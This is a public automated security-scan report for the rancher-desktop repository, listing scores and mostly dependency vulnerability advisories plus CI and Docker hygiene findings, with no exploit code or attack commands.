Public scan — anyone with this URL can view this analysis. Sign up to track your own repos privately, run scheduled re-scans, and get AI fix prompts via your dashboard.
Sign up free Scan another repo
55 of your 677 findings came from Repobility's proprietary detections. ✓ Repobility tags below mark them.

Scan timing: clone 3.71s · analysis 60.83s · 7.4 MB · GitHub preflight 469ms

rancher-sandbox/rancher-desktop

https://github.com/rancher-sandbox/rancher-desktop · scanned 2026-06-05 18:18 UTC (4 days, 14 hours ago) · 10 languages

996 raw signals (540 security + 456 graph) 12th percentile · Typescript · large (100-500K LoC) System graph score 50 (higher by 13)

File as issue Image
UNIFIED Repobility · multi-layer engine · AI coders

Complete repo analysis

Last scanned 4 days, 14 hours ago · v2 · 400 actionable findings from 2 signal sources. 368 repeated signals grouped for readability. Security checks, system graph analysis, and verified AI-agent feedback are merged into one review queue.

JSON
Combined
52.4
/100
Security checks
54
186 findings
System graph
51
100.0% cov · 214 findings
Critical
1
click to filter
Agents
6
0 votes
Crowd
0
reported
Score breakdown â 2026-05-18-v5
Component Sub-score Weight Contribution
structure_score 85.0 0.15 12.75
security_score 14.7 0.25 3.67
testing_score 72.0 0.20 14.40
documentation_score 90.7 0.15 13.61
practices_score 88.0 0.15 13.20
code_quality 58.0 0.10 5.80
Overall 1.00 63.4
Severity distribution — click a segment to filter
Active filters: excluding tests × Reset all
Severity: Critical 1 High 103 Medium 48 Low 169 9-Layer: Software Security Quality Integrity Frontend Hardware Data Network Cicd Source: Security checks 186 System graph 214 Crowd 0 Layer: Quality 80 Security 10 Software 187 Cicd 11 Frontend 106 Hardware 4 Api 2
Scan summary Quality grade C+ (63/100). Dimensions: security 15, maintainability 85. 540 findings (412 security). 115,993 lines analyzed.

Showing 309 of 400 actionable findings. 768 raw detector signals were grouped into reader-sized issues. Click TP / FP to vote on a finding's accuracy — votes adjust the confidence weighting and improve detection across the platform.

critical Security checks security secrets conf 0.95 Identified a Private Key, which may compromise cryptographic security and sensitive data encryption.
Gitleaks detected a committed secret or credential pattern.
pkg/rancher-desktop/assets/translations/en-us.yaml:694
low Security checks cicd CI/CD security conf 0.35 ✓ Repobility 3 occurrences Workflow references repository secrets in a pull_request workflow
Fork pull_request runs do not receive normal repository secrets on GitHub Actions. Review this as a reliability/intent signal, not as direct fork-secret exfiltration. Raise severity only for pull_request_target or another trusted-context path that runs untrusted PR code with secrets.
lines 128, 129, 131
.github/workflows/package.yaml:128, 129, 131 (3 hits)
CI/CD securityworkflow secretsGitHub Actions
high Security checks software dependencies conf 0.88 @babel/plugin-transform-modules-systemjs: GHSA-fv7c-fp4j-7gwp
@babel/plugin-transform-modules-systemjs generates arbitrary code when compiling malicious input
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-2v35-w6hq-6mfw
xmldom: Uncontrolled recursion in XML serialization leads to DoS
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-f6ww-3ggp-fr8h
xmldom has XML injection through unvalidated DocumentType serialization
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-j759-j44w-7fr8
xmldom has XML node injection through unvalidated comment serialization
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-wh4c-j3r5-mjhp
xmldom: XML injection via unsafe CDATA serialization allows attacker-controlled markup insertion
yarn.lock
high Security checks software dependencies conf 0.88 @xmldom/xmldom: GHSA-x6wf-f3px-wcqx
xmldom has XML node injection through unvalidated processing instruction serialization
yarn.lock
high Security checks quality Quality conf 1.00 [SEC080] Python: tarfile.extractall without filter: tarfile.extract*() without filter='data' allows path-traversal (CVE-2007-4559, fixed via PEP 706 in 3.12). Ported from bandit B202 (Apache-2.0).
Add `filter='data'` (Python ≥ 3.12) or manually validate member paths against `os.path.abspath`.
scripts/dependencies/tar-archives.ts:133
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-6v7q-wjvx-w8wg
basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands
yarn.lock
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-chqc-8p9q-pq6q
basic-ftp has FTP Command Injection via CRLF
yarn.lock
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rp42-5vxx-qpwr
basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()
yarn.lock
high Security checks software dependencies conf 0.88 basic-ftp: GHSA-rpmf-866q-6p89
basic-ftp allows a malicious FTP server to cause client-side denial of service via unbounded multiline control response buffering
yarn.lock
high Security checks software dependencies conf 0.88 fast-uri: GHSA-q3j6-qgpj-74h6
fast-uri vulnerable to path traversal via percent-encoded dot segments
yarn.lock
high Security checks software dependencies conf 0.88 fast-uri: GHSA-v39h-62p7-jpjc
fast-uri vulnerable to host confusion via percent-encoded authority delimiters
yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-25h7-pfq9-p65f
flatted vulnerable to unbounded recursion DoS in parse() revive phase
yarn.lock
high Security checks software dependencies conf 0.88 flatted: GHSA-rf6f-7fwh-wjgh
Prototype Pollution via parse() in NodeJS flatted
yarn.lock
low Security checks cicd CI/CD security conf 0.90 ✓ Repobility 11 occurrences GitHub Action is tag-pinned rather than SHA-pinned
Action `actions/checkout` pinned to mutable ref `@v3` uses a mutable tag or branch. Pin external actions to a reviewed full commit SHA when the workflow is security-sensitive.
2 files, 11 locations
src/go/networking/.github/workflows/release.yaml:19, 23, 34, 39, 51, 55 (8 hits)
src/go/networking/.github/workflows/go.yaml:14, 19 (3 hits)
CI/CD securitySupply chainGitHub Actions
medium Security checks cicd CI/CD security conf 0.90 ✓ Repobility 4 occurrences GitHub Action is tag-pinned rather than SHA-pinned
Action `golangci/golangci-lint-action` pinned to mutable ref `@v3.1.0` uses a mutable tag or branch. Pin external actions to a reviewed full commit SHA when the workflow is security-sensitive.
lines 28, 39
src/go/networking/.github/workflows/go.yaml:28, 39 (4 hits)
CI/CD securitySupply chainGitHub Actions
high Security checks software dependencies conf 0.88 github.com/docker/docker: GHSA-rg2x-37c3-w2rh
Docker: Race condition in docker cp allows bind mount redirection to host path
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 github.com/docker/docker: GHSA-x86f-5xw2-fm2r
Docker: `PUT /containers/{id}/archive` executes container binary on the host
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 github.com/docker/docker: GO-2026-4883
Moby has an Off-by-one error in its plugin privilege validation in github.com/docker/docker
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 github.com/docker/docker: GO-2026-4887
Moby has AuthZ plugin bypass when provided oversized request bodies in github.com/docker/docker
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.90 ✓ Repobility go.mod replaces `github.com/lima-vm/lima` — redirects to fork `github.com/rancher-sandbox/lima`
`replace github.com/lima-vm/lima => github.com/rancher-sandbox/lima` overrides the canonical dependency with a different source (redirects to fork `github.com/rancher-sandbox/lima`). Local-path replaces are fine for monorepos but in published modules they can hide malicious forks from anyone who on…
src/go/guestagent/go.mod:122
high Security checks software dependencies conf 0.88 go.opentelemetry.io/otel: GHSA-mh2q-q3fh-2475
OpenTelemetry-Go: multi-value `baggage` header extraction causes excessive allocations (remote dos amplification)
src/go/guestagent/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5005
Invoking key constraints not enforced in golang.org/x/crypto/ssh/agent
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5006
Invoking agent constraints dropped when forwarding keys in golang.org/x/crypto/ssh/agent
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5013
Invoking byte arithmetic causes underflow and panic in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5014
Invoking bypass of certificate restrictions in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5015
Invoking server panic during CheckHostKey/Authenticate in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5016
Invoking memory leak when rejecting channels can lead to DoS in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5017
Invoking client can cause server deadlock on unexpected responses in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5018
Invoking pathological RSA/DSA parameters may cause DoS in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5019
Invoking bypass of FIDO/U2F security keys physical interaction in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5020
Invoking infinite loop on large channel writes in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5021
Invoking auth bypass via unenforced @revoked status in golang.org/x/crypto/ssh/knownhosts
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5023
Invoking VerifiedPublicKeyCallback permissions skip enforcement in golang.org/x/crypto/ssh
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 2 occurrences golang.org/x/crypto: GO-2026-5033
Invoking pathological inputs can lead to client panic in golang.org/x/crypto/ssh/agent
2 files, 2 locations
src/go/guestagent/go.mod
src/go/networking/go.mod
high Security checks software dependencies conf 0.88 js-cookie: GHSA-qjx8-664m-686j
JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection
yarn.lock
high Security checks software dependencies conf 0.88 minimatch: GHSA-23c5-xmqv-rm74
minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
yarn.lock
high Security checks software dependencies conf 0.88 minimatch: GHSA-3ppc-4f35-3m26
minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
yarn.lock
high Security checks software dependencies conf 0.88 minimatch: GHSA-7r86-cg39-jmmj
minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
yarn.lock
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-37ch-88jc-xwx2
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple route parameters
yarn.lock
high Security checks software dependencies conf 0.88 path-to-regexp: GHSA-j3q9-mxjg-w52f
path-to-regexp vulnerable to Denial of Service via sequential optional groups
yarn.lock
high Security checks software dependencies conf 0.88 picomatch: GHSA-c2c7-rcm5-vvqj
Picomatch has a ReDoS vulnerability via extglob quantifiers
yarn.lock
high Security checks software dependencies conf 0.88 serialize-javascript: GHSA-5c6j-r48x-rmvq
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
yarn.lock
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-3955
CrossOriginProtection insecure bypass patterns not limited to exact matches in net/http
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4006
Excessive CPU consumption in ParseAddress in net/mail
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4007
Quadratic complexity when checking name constraints in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4008
ALPN negotiation error contains attacker controlled information in crypto/tls
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4009
Quadratic complexity when parsing some invalid inputs in encoding/pem
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4010
Insufficient validation of bracketed IPv6 hostnames in net/url
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4011
Parsing DER payload can cause memory exhaustion in encoding/asn1
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4012
Lack of limit when parsing cookies can cause memory exhaustion in net/http
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4013
Panic when validating certificates with DSA public keys in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4014
Unbounded allocation when parsing GNU sparse map in archive/tar
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4015
Excessive CPU consumption in Reader.ReadResponse in net/textproto
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4155
Excessive resource consumption when printing error string for host certificate validation in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2025-4175
Improper application of excluded DNS name constraints when verifying wildcard names in crypto/x509
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4337
Unexpected session resumption in crypto/tls
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4340
Handshake messages may be processed at the incorrect encryption level in crypto/tls
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4341
Memory exhaustion in query parameter parsing in net/url
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 7 occurrences stdlib: GO-2026-4342
Excessive CPU consumption when building archive index in archive/zip
7 files, 7 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 2 occurrences stdlib: GO-2026-4599
Incorrect enforcement of email constraints in crypto/x509
2 files, 2 locations
src/go/guestagent/go.mod
src/go/wsl-helper/go.mod
high Security checks software dependencies conf 0.88 2 occurrences stdlib: GO-2026-4600
Panic in name constraint checking for malformed certificates in crypto/x509
2 files, 2 locations
src/go/guestagent/go.mod
src/go/wsl-helper/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4601
Incorrect parsing of IPv6 host literals in net/url
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4602
FileInfo can escape from a Root in os
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4603
URLs in meta content attribute actions are not escaped in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4864
TOCTOU permits root escape on Linux via Root.Chmod in os in internal/syscall/unix
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4865
JsBraceDepth Context Tracking Bugs (XSS) in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 2 occurrences stdlib: GO-2026-4866
Case-sensitive excludedSubtrees name constraints cause Auth Bypass in crypto/x509
2 files, 2 locations
src/go/guestagent/go.mod
src/go/wsl-helper/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4869
Unbounded allocation for old GNU sparse in archive/tar
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4870
Unauthenticated TLS 1.3 KeyUpdate record can cause persistent connection retention and DoS in crypto/tls
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4918
Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/net
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4946
Inefficient policy validation in crypto/x509
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4947
Unexpected work during chain building in crypto/x509
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4971
Panic in Dial and LookupPort when handling NUL byte on Windows in net
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4976
ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputil
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4977
Quadratic string concatenation in consumePhrase in net/mail
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4980
Escaper bypass leads to XSS in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4981
Crash when handling long CNAME response in net
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4982
Bypass of meta content URL escaping causes XSS in html/template
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-4986
Quadratic string concatentation in consumeComment in net/mail
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-5037
Inefficient candidate hostname parsing in crypto/x509
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-5038
Quadratic complexity in WordDecoder.DecodeHeader in mime
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 9 occurrences stdlib: GO-2026-5039
Arbitrary inputs are included in errors without any escaping in net/textproto
9 files, 9 locations
scripts/go.mod
src/go/docker-credential-none/go.mod
src/go/guestagent/go.mod
src/go/mock-wsl/go.mod
src/go/nerdctl-stub/go.mod
src/go/networking/go.mod
src/go/rdctl/go.mod
src/go/spin-stub/go.mod
high Security checks software dependencies conf 0.88 svgo: GHSA-xpqw-6gx7-v673
SVGO DoS through entity expansion in DOCTYPE (Billion Laughs)
yarn.lock
high Security checks software dependencies conf 0.88 tmp: GHSA-ph9p-34f9-6g65
tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape
yarn.lock
high System graph api Wiring conf 1.00 Dangling fetch: GET http://127.0.0.1:${ port }/v1/namespaces (pkg/rancher-desktop/backend/steve.ts:228)
`pkg/rancher-desktop/backend/steve.ts:228` calls `GET http://127.0.0.1:${ port }/v1/namespaces` but no backend route matches that path. This is a runtime 404 waiting to happen. Tool: fetch Normalized path used for matching: `/http:/127.0.0.1:/<p>/v1/namespaces` If this points at an external API, p…
Dangling fetchFetch
medium Security checks security auth conf 0.92 [AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
high Security checks security auth conf 0.74 [AUC002] Low visible authorization coverage in route inventory: Only 0.0% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
Only 0.0% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
low Security checks security Injection conf 0.50 [SEC005] Command Injection Risk: Unsafe shell execution or eval of user input.
Use subprocess with shell=False and a list of args. Never eval user input.
.yarn/plugins/plugin-rancher-desktop-license-checker.cjs:80
high Security checks quality Quality conf 0.72 Agent control bridge may listen on a network interface without visible auth
Agent, MCP, sidecar, and command bridge servers often start as local helpers. Binding them to 0.0.0.0 or a default all-interface listener without an authorization guard can expose tool execution or session data to the LAN.
pkg/rancher-desktop/backend/wsl.ts:30
medium Security checks software dependencies conf 0.88 ajv: GHSA-2g4f-4pwh-qvx6
ajv has ReDoS when using `$data` option
yarn.lock
medium Security checks software dependencies conf 0.88 brace-expansion: GHSA-f886-m6hf-6m8v
brace-expansion: Zero-step sequence causes process hang and memory exhaustion
yarn.lock
medium Security checks software dependencies conf 0.88 brace-expansion: GHSA-jxxr-4gwj-5jf2
brace-expansion: Large numeric range defeats documented `max` DoS protection
yarn.lock
medium Security checks cicd CI/CD security conf 0.90 Docker build context has no .dockerignore
Without .dockerignore, build context can include source history, local env files, dependencies, and generated artifacts.
.dockerignore CI/CD securitycontainers
high Security checks cicd CI/CD security conf 0.82 3 occurrences Docker final stage has no non-root USER
Docker images run as root unless the image or Dockerfile switches to a non-root user.
3 files, 3 locations
bats/tests/compose/testdata/Dockerfile.nginx:2
bats/tests/compose/testdata/app/Dockerfile:2
bats/tests/extensions/testdata/Dockerfile:13
CI/CD securitycontainers
medium Security checks software dependencies conf 0.88 follow-redirects: GHSA-r4q5-vmmm-2653
follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets
yarn.lock
high Security checks quality Quality conf 0.74 Frontend API reference is not matched by discovered backend routes
A frontend string references a same-origin API path that Repobility could not match to backend route inventory. This often causes live 404s in user journeys.
pkg/rancher-desktop/backend/kube/client.ts:273
high Security checks software dependencies conf 0.90 GitHub Action `actions/checkout@v3` is 3 major version(s) behind (latest v6.0.3)
`uses: actions/checkout@v3` is 3 major version(s) behind the latest published release v6.0.3. Old action majors run on deprecated runner images / Node versions and miss upstream fixes. This is the exact 'outdated GitHub Action' class Dependabot raises — and which Repobility had no coverage for.
src/go/networking/.github/workflows/release.yaml:19
high Security checks software dependencies conf 0.90 GitHub Action `actions/checkout@v3` is 3 major version(s) behind (latest v6.0.3)
`uses: actions/checkout@v3` is 3 major version(s) behind the latest published release v6.0.3. Old action majors run on deprecated runner images / Node versions and miss upstream fixes. This is the exact 'outdated GitHub Action' class Dependabot raises — and which Repobility had no coverage for.
src/go/networking/.github/workflows/go.yaml:14
high Security checks software dependencies conf 0.90 GitHub Action `actions/download-artifact@v3` is 5 major version(s) behind (latest v8.0.1)
`uses: actions/download-artifact@v3` is 5 major version(s) behind the latest published release v8.0.1. Old action majors run on deprecated runner images / Node versions and miss upstream fixes. This is the exact 'outdated GitHub Action' class Dependabot raises — and which Repobility had no coverage…
src/go/networking/.github/workflows/release.yaml:51
high Security checks software dependencies conf 0.90 GitHub Action `actions/setup-go@v3` is 3 major version(s) behind (latest v6.4.0)
